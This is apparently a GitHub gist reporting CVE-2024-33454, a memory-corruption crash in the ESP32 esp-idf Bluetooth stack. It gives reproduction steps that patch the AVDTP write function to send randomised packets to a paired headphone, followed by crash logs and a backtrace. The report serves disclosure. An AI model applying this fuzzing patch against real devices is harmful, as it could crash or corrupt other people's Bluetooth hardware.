Last active
May 10, 2024 01:41
-
-
Save Zakary-D/30f565c4266c02c62aa9089c363e78e9 to your computer and use it in GitHub Desktop.
CVE-2024-33454 Guru Meditation Error and rebooting when using ESP32 bluetooth
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CVE-2024-33454 | |
| IDF version. | |
| v5.1.3-416-gd23b7a0361 | |
| Espressif SoC revision. | |
| ESP32D0WDQ5(revision 3) | |
| Operating System used. | |
| Linux | |
| How did you build your project? | |
| Command line with idf.py | |
| If you are using Windows, please specify command line type. | |
| None | |
| Development Kit. | |
| ESP-WROVER-KIT | |
| Power Supply used. | |
| USB | |
| What is the expected behavior? | |
| send modified AVDTP packet to peer. | |
| What is the actual behavior? | |
| memory corruption and rebooting | |
| Steps to reproduce. | |
| 1.modify code: esp-idf/components/bt/host/bluedroid/stack/avdt/avdt_ad.c | |
| UINT8 avdt_ad_write_req(UINT8 type, tAVDT_CCB *p_ccb, tAVDT_SCB *p_scb, BT_HDR *p_buf) | |
| { | |
| UINT8 tcid; | |
| /* get tcid from type, scb */ | |
| tcid = avdt_ad_type_to_tcid(type, p_scb); | |
| srand(time(NULL)); | |
| // p_buf[0].event = (uint16_t)rand(); | |
| if(type == AVDT_CHAN_MEDIA){ | |
| p_buf->event = (uint16_t)rand(); | |
| p_buf->len = (uint16_t)rand() % 255; | |
| p_buf->offset = (uint16_t)rand(); | |
| p_buf->layer_specific = (uint16_t)rand(); | |
| for(int i = 0; i < p_buf->len; ++i) p_buf->data[i] = (uint16_t)rand(); | |
| } | |
| static int dk_cnt = 0; | |
| if(++dk_cnt % 1000 == 0){ | |
| dk_cnt = 0, printf("\n\n avdt_ad_write_req \n"); | |
| printf("%" PRIu16 " ", p_buf->event); | |
| printf("%" PRIu16 " ", p_buf->len); | |
| printf("%" PRIu16 " ", p_buf->offset); | |
| printf("%" PRIu16 " \n", p_buf->layer_specific); | |
| for(int i = 0; i < p_buf->len; ++i) printf("%" PRIu16 " ", p_buf->data[i]); | |
| printf("\n\n"); | |
| } | |
| return L2CA_DataWrite(avdt_cb.ad.rt_tbl[avdt_ccb_to_idx(p_ccb)][tcid].lcid, p_buf); | |
| } | |
| change the target device name of example/a2dp_source to my headphone: HUAWEI FreeBuds 4i | |
| use idf.py to build example/a2dp_source | |
| 4.flash it to ESP-WROVER-KIT and monitor it | |
| 5.about half an hour later, something get wrong and the development board rebooting | |
| Debug Logs. | |
| Guru Meditation Error: Core 0 panic'ed (StoreProhibited). Exception was unhandled. | |
| Core 0 register dump: | |
| PC : 0x40093232 PS : 0x00060333 A0 : 0x80092e87 A1 : 0x3ffd0350 | |
| 0x40093232: remove_free_block at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:332 | |
| (inlined by) block_remove at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:380 | |
| (inlined by) block_merge_next at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:486 | |
| (inlined by) tlsf_free at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:1123 | |
| A2 : 0x3ffcc144 A3 : 0x3ffd7838 A4 : 0x3ffd7830 A5 : 0x3ffc0042 | |
| A6 : 0x00000028 A7 : 0x00000058 A8 : 0x00000018 A9 : 0x3ffd8844 | |
| A10 : 0x3ffd8844 A11 : 0x00000000 A12 : 0x0099009d A13 : 0x00000004 | |
| A14 : 0xb33fffff A15 : 0xb33fffff SAR : 0x0000001c EXCCAUSE: 0x0000001d | |
| EXCVADDR: 0x009900a9 LBEG : 0x4000c2e0 LEND : 0x4000c2f6 LCOUNT : 0xffffffff | |
| 0x4000c2e0: memcpy in ROM | |
| 0x4000c2f6: memcpy in ROM | |
| Backtrace: 0x4009322f:0x3ffd0350 0x40092e84:0x3ffd0370 0x40082362:0x3ffd0390 0x4009406d:0x3ffd03b0 0x400de242:0x3ffd03d0 0x400df122:0x3ffd03f0 0x400de459:0x3ffd0410 0x4010c2fa:0x3ffd0430 0x400de4b5:0x3ffd0450 0x4010d2ce:0x3ffd0470 0x4010d19a:0x3ffd0490 0x40090ad5:0x3ffd04c0 | |
| 0x4009322f: remove_free_block at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:331 | |
| (inlined by) block_remove at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:380 | |
| (inlined by) block_merge_next at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:486 | |
| (inlined by) tlsf_free at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:1123 | |
| 0x40092e84: multi_heap_free_impl at /root/esp/esp-idf/components/heap/multi_heap.c:231 | |
| 0x40082362: heap_caps_free at /root/esp/esp-idf/components/heap/heap_caps.c:388 | |
| 0x4009406d: free at /root/esp/esp-idf/components/newlib/heap.c:39 | |
| 0x400de242: transmit_fragment at /root/esp/esp-idf/components/bt/host/bluedroid/hci/hci_layer.c:350 | |
| 0x400df122: fragment_and_dispatch at /root/esp/esp-idf/components/bt/host/bluedroid/hci/packet_fragmenter.c:132 | |
| 0x400de459: event_packet_ready at /root/esp/esp-idf/components/bt/host/bluedroid/hci/hci_layer.c:338 | |
| 0x4010c2fa: fixed_queue_process at /root/esp/esp-idf/components/bt/common/osi/fixed_queue.c:254 | |
| 0x400de4b5: hci_downstream_data_handler at /root/esp/esp-idf/components/bt/host/bluedroid/hci/hci_layer.c:238 | |
| 0x4010d2ce: osi_thread_generic_event_handler at /root/esp/esp-idf/components/bt/common/osi/thread.c:425 | |
| 0x4010d19a: osi_thread_run at /root/esp/esp-idf/components/bt/common/osi/thread.c:165 (discriminator 1) | |
| 0x40090ad5: vPortTaskWrapper at /root/esp/esp-idf/components/freertos/FreeRTOS-Kernel/portable/xtensa/port.c:162 | |
| ELF file SHA256: fb53a7e2e55ccb03 | |
| Rebooting... | |
| ets Jul 29 2019 12:21:46 | |
| CVE-2024-33454 was assigned to this issue. | |
| > ------------------------------------------ | |
| > | |
| > [Vulnerability Type] | |
| > Buffer Overflow | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Vendor of Product] | |
| > https://github.com/espressif/esp-idf/tree/release/v5.1 | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Affected Product Code Base] | |
| > esp-idf - v5.1 | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Affected Component] | |
| > Bluetooth stack of esp-idf5.1,memory corruption due to missing bounds checking(exp:https://www.esp32.com/viewtopic.php?f=14&t=39478) | |
| > |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment